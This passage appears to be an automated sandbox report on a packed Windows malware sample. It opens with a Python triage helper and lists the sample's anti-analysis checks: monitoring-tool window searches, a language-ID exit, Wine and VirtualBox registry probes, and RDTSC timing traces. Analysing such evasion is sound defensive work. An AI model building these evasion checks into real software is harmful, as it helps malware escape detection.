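        "checksum_ok": stored == computed,   # a stored 0 is common and benign on its own
    }

def build_sample_pe(checksum: int = 0) -> bytes:
    """Constructed, non-loadable PE32: a zeroed .text plus a high-entropy section
    named shkwfujq (the packed section from this report) holding the entry point."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x2010)                     # entry point RVA
    struct.pack_into("<I", opt, 0x1C, 0x400000)                   # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)             # section/file alignment
    struct.pack_into("<II", opt, 0x38, 0x3000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x40, checksum)                   # CheckSum
    struct.pack_into("<I", opt, 0x5C, 16)                         # NumberOfRvaAndSizes
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sect += struct.pack("<8sIIIIIIHHI", b"shkwfujq", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xE0000040)
    headers = (dos + coff + bytes(opt) + sect).ljust(0x200, b"\0")
    return headers + b"\0" * 0x200 + bytes(range(256)) * 2        # .text, then shkwfujq
```

Point triage() at open(path, "rb").read() for a real file. Two caveats when reading its output: a stored CheckSum of 0 is common in unsigned binaries and is not suspicious by itself, whereas a wrong non-zero value like the one reported here (0x1c417d against a computed 0x1cf740) usually means the file was rewritten after linking, which is what a packer does; and high entropy alone also flags compressed resources, so weigh it together with the section name and the entry point location as the report does.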

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (searched twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (searched twice)
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13561)
(The report records only that execution can terminate right after the default language ID is queried; which language IDs trigger the exit is not captured here, so do not assume a specific locale list from this entry alone.)
Source: C:\Users\user\Desktop\file.exe | Registry key opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | Registry key opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
(The Wine key and the VBOX__ ACPI table name are the registry checks behind "Tries to detect sandboxes / dynamic malware analysis system (registry check)"; an analysis VM that renames its DSDT and has no Wine key passes both.)
Each RDTSC entry below is a pair of time-stamp-counter reads with the instructions executed between them; the delta is what the packer compares against a threshold to spot single-stepping or a slow emulator. The jumps to the next instruction, the pushad/popad and push/pop pairs between the two reads are the obfuscator's padding, not logic.
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9725BB second address: 971E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jg 00007F4A81237CC6h 0x0000000b pop edx 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 je 00007F4A81237CC7h 0x00000016 stc 0x00000017 push dword ptr [ebp+122D13E1h] 0x0000001d jmp 00007F4A81237CD5h 0x00000022 call dword ptr [ebp+122D1983h] 0x00000028 pushad 0x00000029 jmp 00007F4A81237CCEh 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1A52h], eax 0x00000036 mov dword ptr [ebp+122D1A52h], esi 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 xor dword ptr [ebp+122D1941h], esi 0x00000046 sub dword ptr [ebp+122D1941h], edx 0x0000004c mov dword ptr [ebp+122D2D78h], eax 0x00000052 jns 00007F4A81237CCDh 0x00000058 mov esi, 0000003Ch 0x0000005d cld 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jl 00007F4A81237CCEh 0x00000068 jng 00007F4A81237CC8h 0x0000006e pushad 0x0000006f popad 0x00000070 lodsw 0x00000072 cmc 0x00000073 add eax, dword ptr [esp+24h] 0x00000077 mov dword ptr [ebp+122D19A8h], esi 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jmp 00007F4A81237CD3h 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 pushad 0x0000008a jns 00007F4A81237CC6h 0x00000090 push esi 0x00000091 pop esi 0x00000092 popad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 971E72 second address: 971E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4A80B11C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA96E second address: AEA98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA98D second address: AEA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA991 second address: AEA99E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9A84 second address: AE9A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4A80B11C36h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9A90 second address: AE9AAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F4A81237CD2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9AAC second address: AE9AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9DA2 second address: AE9DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A81237CCBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9EE9 second address: AE9F1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4A80B11C47h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AE9F1D second address: AE9F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A81237CCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA06D second address: AEA08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA08A second address: AEA0AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A81237CDCh 0x00000008 jg 00007F4A81237CC6h 0x0000000e jmp 00007F4A81237CD0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA0AE second address: AEA0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AEA221 second address: AEA22F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4A81237CC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AECFF5 second address: 971E72 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 46C89D33h 0x00000012 push dword ptr [ebp+122D13E1h] 0x00000018 call 00007F4A80B11C3Ch 0x0000001d mov di, D720h 0x00000021 pop esi 0x00000022 or ch, FFFFFFA1h 0x00000025 call dword ptr [ebp+122D1983h] 0x0000002b pushad 0x0000002c jmp 00007F4A80B11C3Eh 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1A52h], eax 0x00000039 mov dword ptr [ebp+122D1A52h], esi 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 xor dword ptr [ebp+122D1941h], esi 0x00000049 sub dword ptr [ebp+122D1941h], edx 0x0000004f mov dword ptr [ebp+122D2D78h], eax 0x00000055 jns 00007F4A80B11C3Dh 0x0000005b mov esi, 0000003Ch 0x00000060 cld 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jl 00007F4A80B11C3Eh 0x0000006b jng 00007F4A80B11C38h 0x00000071 pushad 0x00000072 popad 0x00000073 lodsw 0x00000075 cmc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D19A8h], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007F4A80B11C43h 0x00000089 nop 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d jns 00007F4A80B11C36h 0x00000093 push esi 0x00000094 pop esi 0x00000095 popad 0x00000096 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED054 second address: AED0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e jno 00007F4A81237CC8h 0x00000014 popad 0x00000015 nop 0x00000016 or ecx, dword ptr [ebp+122D2A74h] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2A88h], ecx 0x00000024 push D9311FDDh 0x00000029 jmp 00007F4A81237CCBh 0x0000002e add dword ptr [esp], 26CEE0A3h 0x00000035 pushad 0x00000036 mov edi, dword ptr [ebp+122D2AA7h] 0x0000003c sub dword ptr [ebp+122D374Ah], ebx 0x00000042 popad 0x00000043 push 00000003h 0x00000045 xor ch, 00000050h 0x00000048 push 00000000h 0x0000004a xor ecx, dword ptr [ebp+122D2F4Ch] 0x00000050 push 00000003h 0x00000052 call 00007F4A81237CCAh 0x00000057 mov dword ptr [ebp+122D194Ah], edi 0x0000005d pop edi 0x0000005e push BB79A6C2h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2B7 second address: AED2C1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2C1 second address: AED2C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED2C6 second address: AED2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F4A80B11C3Eh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E8FF second address: B0E90E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CAC8 second address: B0CAD6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CAD6 second address: B0CADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CADA second address: B0CAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C43h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CED7 second address: B0CEEC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F4A81237CC6h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CEEC second address: B0CEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D1C5 second address: B0D1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D1D1 second address: B0D1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F4A80B11C3Eh 0x0000000b pushad 0x0000000c jg 00007F4A80B11C36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D369 second address: B0D3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4A81237CC6h 0x0000000a popad 0x0000000b jmp 00007F4A81237CD0h 0x00000010 pushad 0x00000011 jc 00007F4A81237CC6h 0x00000017 jl 00007F4A81237CC6h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jng 00007F4A81237CCEh 0x00000029 pushad 0x0000002a popad 0x0000002b jg 00007F4A81237CC6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D8CF second address: B0D8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D8D3 second address: B0D8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04AF4 second address: B04AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DA92 second address: B0DAAE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A81237CC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CCEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DAAE second address: B0DAC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DAC8 second address: B0DACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0DACE second address: B0DAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0D6 second address: B0E0F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A81237CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F4A81237CD3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0F5 second address: B0E0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E0FD second address: B0E101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E37D second address: B0E381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4B9 second address: B0E4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4BD second address: B0E4C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4C1 second address: B0E4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4A81237CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4D1 second address: B0E4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4D5 second address: B0E4F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E4F1 second address: B0E523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F4A80B11C47h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jmp 00007F4A80B11C3Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E7AF second address: B0E7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE396F second address: AE39A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F4A80B11C47h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4A80B11C3Fh 0x00000012 pop eax 0x00000013 push ebx 0x00000014 jmp 00007F4A80B11C41h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11620 second address: B11628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B145DA second address: B145E4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B145E4 second address: B14619 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4A81237CD8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 jnc 00007F4A81237CC6h 0x00000017 jp 00007F4A81237CC6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14619 second address: B1461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B14858 second address: B14866 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4A81237CC6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD1C second address: B1AD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD22 second address: B1AD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD2C second address: B1AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD32 second address: B1AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD3B second address: B1AD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AD3F second address: B1AD6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a ja 00007F4A81237CE1h 0x00000010 push esi 0x00000011 jmp 00007F4A81237CD3h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AEBF second address: B1AED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C43h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AED6 second address: B1AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A81237CD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4A81237CC6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B167 second address: B1B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A80B11C45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B303 second address: B1B311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B311 second address: B1B34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A80B11C47h 0x00000008 jmp 00007F4A80B11C3Bh 0x0000000d jmp 00007F4A80B11C45h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B34D second address: B1B36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A81237CD9h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4B0 second address: B1B4ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4A80B11C41h 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4A80B11C41h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4ED second address: B1B4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B4F3 second address: B1B4F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DBE1 second address: B1DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E195 second address: B1E1A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F4A80B11C36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E1A7 second address: B1E1AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E6BD second address: B1E6C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E774 second address: B1E778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E778 second address: B1E7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A80B11C49h 0x0000000b popad 0x0000000c nop 0x0000000d xor esi, 2A426580h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4A80B11C45h 0x0000001d rdtsc
